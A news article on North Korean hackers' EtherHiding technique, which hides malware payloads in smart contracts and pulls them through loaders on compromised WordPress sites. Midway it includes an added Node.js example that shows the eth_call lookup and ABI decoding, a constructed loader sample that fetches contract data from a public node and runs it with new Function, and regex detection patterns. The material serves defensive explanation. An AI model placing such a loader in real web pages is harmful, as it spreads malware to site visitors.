
North Korean Hackers Deploy “EtherHiding” to Spread Malware via Blockchain

A new cyber threat is emerging as North Korean state-backed hackers adopt a technique called EtherHiding, which stores malicious code inside smart contracts on public blockchains. According to Google's Threat Intelligence Group (GTIG), this is a significant evolution in how attackers abuse decentralized systems such as Ethereum and BNB Smart Chain.

EtherHiding lets attackers use smart contracts on public blockchains as hosting for malware payloads. No hosting provider or registrar can take a contract down, and nobody other than whoever controls the contract can alter its state, so takedown requests against the payload go nowhere. The attacker, meanwhile, can swap in a new payload at any time with a single cheap transaction, so the infrastructure stays live for as long as the attacker chooses to maintain it.

The attack typically begins when the attackers compromise a legitimate WordPress site using stolen credentials or unpatched vulnerabilities. They insert a small JavaScript loader into the site's pages; whenever a visitor loads a page, the loader asks a public blockchain node for the current contents of the attacker's smart contract and runs whatever comes back. That lookup is a read-only call answered from the node's copy of the chain: it creates no transaction, leaves no on-chain record and costs the visitor nothing, so the fetch is invisible to anyone watching the blockchain itself. Only the attacker's occasional payload updates touch the chain, and those cost little more than the gas for one transaction.
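The loader flow described above, as an added example that is not part of the article or of GTIG's report: a Node.js script that builds the read-only eth_call a loader sends, ABI-decodes the string a contract returns into the script a loader would execute (here it is only returned), and runs a small static classifier over two constructed page scripts, one modelled on the loader and one a benign dapp widget, to show that the tell is a chain read combined with a script-execution sink rather than the chain read alone. The contract address, the get() selector and both script samples are constructed for the example; nothing is fetched or executed.

```javascript
// Added example: the read-only chain lookup an EtherHiding loader performs, the
// ABI decode that turns the contract's answer into script, and a static check
// for loaders of that shape. Not code from the article or from GTIG; the
// address, selector and both page-script samples below are constructed.
'use strict';

// Hypothetical contract address used by the constructed samples.
const SAMPLE_CONTRACT = '0x1111111111111111111111111111111111111111';
// 4-byte selector of get(): the first four bytes of keccak256("get()").
const GET_SELECTOR = '0x6d4ce63c';

// The JSON-RPC body a loader POSTs to a public node. eth_call is answered
// from the node's own state: it creates no transaction, leaves nothing
// on-chain and costs no gas, which is why the fetch is invisible to anyone
// watching the blockchain itself.
function buildEthCallRequest(contract, selector) {
  return {
    jsonrpc: '2.0',
    id: 1,
    method: 'eth_call',
    params: [{ to: contract, data: selector }, 'latest'],
  };
}

const hexWord = (n) => n.toString(16).padStart(64, '0');

// ABI-encode a string return value: offset word, length word, data padded to
// 32 bytes. This is the shape of what the attacker's contract hands back.
function encodeAbiString(s) {
  const bytes = new TextEncoder().encode(s);
  const hex = Array.from(bytes, (b) => b.toString(16).padStart(2, '0')).join('');
  const padded = hex.padEnd(Math.ceil(bytes.length / 32) * 64, '0');
  return '0x' + hexWord(32) + hexWord(bytes.length) + padded;
}

// Decode an eth_call result back into the stored string. A loader does this
// and then passes the result to eval() or new Function(); here it is only returned.
function decodeAbiString(result) {
  const h = result.startsWith('0x') ? result.slice(2) : result;
  if (h.length < 128) throw new Error('result too short for an ABI string');
  const offset = parseInt(h.slice(0, 64), 16) * 2;
  const len = parseInt(h.slice(offset, offset + 64), 16) * 2;
  const data = h.slice(offset + 64, offset + 64 + len);
  if (data.length !== len) throw new Error('truncated ABI string');
  const bytes = Uint8Array.from(data.match(/../g) || [], (x) => parseInt(x, 16));
  return new TextDecoder().decode(bytes);
}

// Indicators for a page-script scanner. A chain read on its own is normal
// dapp behaviour; a chain read whose result is decoded to text and then
// executed is the loader pattern.
const INDICATORS = [
  ['rpc_endpoint', /bsc-dataseed|binance\.org|infura\.io|alchemy\.com|cloudflare-eth\.com|ankr\.com/i],
  ['eth_call', /["']eth_call["']/],
  ['selector', /["']0x[0-9a-f]{8}["']/i],
  ['hex_decode', /fromCharCode|parseInt\(.*?,\s*16\)|TextDecoder/],
  ['exec_sink', /\beval\s*\(|new\s+Function\s*\(|createElement\s*\(\s*["']script["']\s*\)|document\.write\s*\(/],
];

function classifyScript(src) {
  const hits = INDICATORS.filter(([, re]) => re.test(src)).map(([name]) => name);
  const reads = hits.includes('rpc_endpoint') || hits.includes('eth_call');
  const verdict = reads && hits.includes('exec_sink') ? 'etherhiding-loader'
    : reads ? 'chain-read' : 'clean';
  return { verdict, hits };
}

// Constructed sample modelled on the loader described above (never executed here).
const SAMPLE_LOADER = `(async()=>{const r=await fetch("https://bsc-dataseed.binance.org/",{method:"POST",
body:JSON.stringify({jsonrpc:"2.0",id:1,method:"eth_call",params:[{to:"${SAMPLE_CONTRACT}",data:"${GET_SELECTOR}"},"latest"]})});
const j=await r.json();let s="";for(let i=130;i<j.result.length;i+=2)s+=String.fromCharCode(parseInt(j.result.substr(i,2),16));
new Function(s)();})();`;

// Constructed benign sample: a widget that reads a balanceOf() and displays it.
const SAMPLE_DAPP = `fetch("https://cloudflare-eth.com",{method:"POST",body:JSON.stringify({jsonrpc:"2.0",id:1,method:"eth_call",
params:[{to:"${SAMPLE_CONTRACT}",data:"0x70a08231"},"latest"]})}).then(r=>r.json())
.then(j=>{document.getElementById("bal").textContent=BigInt(j.result).toString();});`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(buildEthCallRequest(SAMPLE_CONTRACT, GET_SELECTOR)));
  console.log(decodeAbiString(encodeAbiString('document.title="constructed payload"')));
  console.log(classifyScript(SAMPLE_LOADER), classifyScript(SAMPLE_DAPP));
}
```

The classifier deliberately reports a dapp widget that reads a balance as `chain-read`, not as malicious; blocking every page that talks to a public RPC endpoint would break legitimate sites, while a script that decodes an eth_call result to text and feeds it to `new Function` or a freshly created script element has no honest reason to exist on a WordPress page.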

GTIG traced the first use of EtherHiding to September 2023 and the CLEARFAKE campaign, which lured visitors to compromised sites with fake browser-update prompts. Security researchers say the technique marks a shift in North Korea's cyber operations, from stealing cryptocurrency to using the blockchain itself as attack infrastructure.

Researchers such as John Scott-Railton of Citizen Lab caution that if EtherHiding is combined with AI automation, future attacks could become nearly impossible to trace. The technique could turn public blockchains into a new form of "bulletproof hosting" that shields malware distribution from takedowns and from traditional security controls.

North Korean hackers have already stolen over $1.5 billion in cryptocurrency this year, according to TRM Labs, funding Pyongyang's military and sanctions-evasion programs. To mitigate the threat, experts advise users to refuse unexpected downloads such as "browser update" prompts, site operators to restrict which scripts their pages may load and which endpoints those scripts may contact, and defenders to examine any smart contract referenced by a suspicious script for the code it stores.

<Copyright ⓒ TokenPost, unauthorized reproduction and redistribution prohibited>
